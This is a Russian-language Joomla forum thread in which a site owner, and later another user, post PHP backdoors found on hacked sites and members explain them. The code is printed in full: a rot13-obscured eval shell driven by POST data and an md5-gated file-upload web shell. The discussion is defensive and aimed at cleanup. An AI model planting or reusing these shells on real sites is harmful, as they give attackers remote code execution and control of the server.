Взломали сайт, что делает код?

Леон

Захожу иногда
333
5 / 0

Взломали сайт, что делает код?

« : 16.07.2016, 14:38:32 »

Здравствуйте. Недавно обнаружил на своем сайте один подозрительный php файл, прогнал через ai-bolit, нашел множество файлов с одинаковым кодом (с разными именами), в разных директориях сайта. Что он делает?

1. файл:

Код

<?php isset($_POST['airq8i']) && ($www= $_POST['airq8i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

2. файл:

Код

<?php isset($_POST['340q10']) && ($www= $_POST['340q10']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

И все файлы в таком роде.

Я так понял если ему передать пост данные, то что он сделает?

« Последнее редактирование: 16.07.2016, 14:46:47 от Леон »

Записан

flyingspook

Moderator
3590
247 / 9

Re: Взломали сайт, что делает код?

« Ответ #1 : 16.07.2016, 14:52:14 »

Цитата: Леон от 16.07.2016, 14:38:32

Я так понял если ему передать пост данные, то что он сделает?

Выполнит то что ему указано

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Леон

Захожу иногда
333
5 / 0

Re: Взломали сайт, что делает код?

« Ответ #2 : 16.07.2016, 14:59:46 »

Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?

Записан

winstrool

Давно я тут
820
51 / 2
Свободен для работы

Re: Взломали сайт, что делает код?

« Ответ #3 : 16.07.2016, 15:13:10 »

Цитата: Леон от 16.07.2016, 14:59:46

Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?

Разные только параметры POST, все остальное одинаково

Записан

Как вылечить сайт от вирусов? |Глаз бога/пробив

Леон

Захожу иногда
333
5 / 0

Re: Взломали сайт, что делает код?

« Ответ #4 : 16.07.2016, 15:15:25 »

Нашел еще один файл на сайте, тут уже похоже форма загрузки файлов:

Код

<?php if(md5($_GET["ms-load"])=="cb8f68e224e682ef7f1b3747f3f749d4"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}

Записан

wishlight

Гуру
5078
320 / 1
От 300 руб быстрый хостинг. Сервера.

Re: Взломали сайт, что делает код?

« Ответ #5 : 16.07.2016, 15:21:55 »

Она самая.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

winstrool

Давно я тут
820
51 / 2
Свободен для работы

Re: Взломали сайт, что делает код?

« Ответ #6 : 16.07.2016, 15:32:11 »

Молодец, в верном направлении мыслишь!

Записан

Как вылечить сайт от вирусов? |Глаз бога/пробив

Леон

Захожу иногда
333
5 / 0

Re: Взломали сайт, что делает код?

« Ответ #7 : 19.07.2016, 14:02:05 »

Удалил все подозрительные файлы. Сменил пароли, обновил движок, поставил компонент Securitycheck Pro J3x. Прошло 2 дня, пока все чисто, прогонял еще раз ai-bolit'ом, ничего нового не появилось) Жаль не удалось узнать что именно эти вирусы делали.

Записан

Masha0701

Осваиваюсь на форуме
28
0 / 0

Re: Взломали сайт, что делает код?

« Ответ #8 : 01.12.2016, 10:31:03 »

Я так понимаю, это тоже инъекция ?

_______________
<?php if(md5($_GET["ms-load"])=="8e5c6d4f76b8a4c0593846e4aeffc38c"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
_________________________

Записан

draff

Гуру
5801
434 / 7
ищу работу

Re: Взломали сайт, что делает код?

« Ответ #9 : 01.12.2016, 10:45:35 »

Похоже - да. А в файле есть проверка на вход через Joomla ?

Код

// no direct access
defined('_JEXEC') or die('Restricted access');

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

winstrool

Давно я тут
820
51 / 2
Свободен для работы

Re: Взломали сайт, что делает код?

« Ответ #10 : 01.12.2016, 11:55:21 »

Цитата: Masha0701 от 01.12.2016, 10:31:03

Я так понимаю, это тоже инъекция ?

НЕТ! это называется уплодер))))

Записан

Как вылечить сайт от вирусов? |Глаз бога/пробив

wishlight

Гуру
5078
320 / 1
От 300 руб быстрый хостинг. Сервера.

Re: Взломали сайт, что делает код?

« Ответ #11 : 01.12.2016, 11:58:25 »

Цитата: Masha0701 от 01.12.2016, 10:31:03

Я так понимаю, это тоже инъекция ?

Последствия ее. Лечить и обновлять.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

Вирус js.redirector.304 Автор tegos134	Ответов: 1 Просмотров: 1579	24.08.2016, 22:18:17 от beliyadm
В Head появляется скрипт Автор Zegeberg	Ответов: 3 Просмотров: 1594	23.06.2016, 16:07:19 от Zegeberg
Проблемы с правами после смены хостинга Автор Леон	Ответов: 2 Просмотров: 1524	10.05.2016, 11:39:36 от Леон
Появляются новые пользователи "Super User" с логи Автор crcp_kz	Ответов: 9 Просмотров: 3064	25.04.2016, 11:54:06 от FitMe
Re: Два проникновения на сайт с обновленной Joomla Автор Agard	Ответов: 9 Просмотров: 1460	08.03.2016, 10:58:38 от winstrool

Взломали сайт, что делает код? - Безопасность сайтов на Joomla

Новости Joomla

Проблемы с доступом к сайту расширений для JoomShopping - Nevigen

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

👩‍💻 Joomla-ресурсы в мессенджере MAX.

Леон

Взломали сайт, что делает код?

flyingspook

Re: Взломали сайт, что делает код?

Леон

Re: Взломали сайт, что делает код?

winstrool

Re: Взломали сайт, что делает код?

Леон

Re: Взломали сайт, что делает код?

wishlight

Re: Взломали сайт, что делает код?

winstrool

Re: Взломали сайт, что делает код?

Леон

Re: Взломали сайт, что делает код?

Masha0701

Re: Взломали сайт, что делает код?

draff

Re: Взломали сайт, что делает код?

winstrool

Re: Взломали сайт, что делает код?

wishlight

Re: Взломали сайт, что делает код?

Похожие темы